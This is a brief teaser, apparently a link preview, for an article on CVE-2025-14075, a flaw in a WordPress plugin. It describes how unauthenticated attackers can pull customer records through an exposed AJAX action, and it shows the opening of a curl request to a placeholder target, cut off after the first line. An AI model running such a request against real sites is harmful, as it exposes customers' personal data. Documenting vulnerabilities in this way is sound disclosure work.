CVE-2025-14075
## The Exploit Unauthenticated attackers can retrieve customer records by calling the exposed AJAX action with a valid publicly accessible nonce and a target email address. ```bash curl 'https://TARGET_DOMAIN/wp-admin/admin-ajax.php' \ ...
Read article →